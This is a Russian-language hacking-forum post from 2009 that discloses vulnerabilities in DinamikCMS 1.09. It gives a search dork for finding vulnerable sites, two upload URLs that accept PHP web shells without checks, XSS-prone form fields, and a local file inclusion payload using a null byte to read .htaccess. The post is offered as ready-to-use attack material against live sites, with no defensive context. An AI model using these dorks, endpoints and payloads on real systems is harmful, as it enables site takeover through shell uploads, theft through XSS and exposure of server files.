Уязвимости DinamikCMS

Discussion in 'Веб-уязвимости' started by Twoster, 5 Jan 2009.

  1. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Уязвимый продукт: DinamikCMS
    Версия: 1.09
    Дорк: Powered by DinamikCMS v.1.09

    Просто удивительная CMS

    1. Заливка шелла
    cms_site.ru/?pg=module/files/addfiles
    cms_site.ru/?pg=module/galerea/addfoto
    Загружаемые файлы совершенно не проверяются, можно загрузить шелл c расширением .php абсолютно безо всяких проблем! =)

    2. XSS
    a) добавляем статью, в поле "Предисловие" отлично проходит XSS
    cms_site.ru/?pg=module/article/addarticle
    b) Редактирование профиля, XSS подвержены все поля
    cms_site.ru/?pg=edituser

    3. Локальный инклуд
    cms_site.ru/?pg=../.htaccess%00
     
    #1 Twoster, 5 Jan 2009
    Last edited: 5 Jan 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.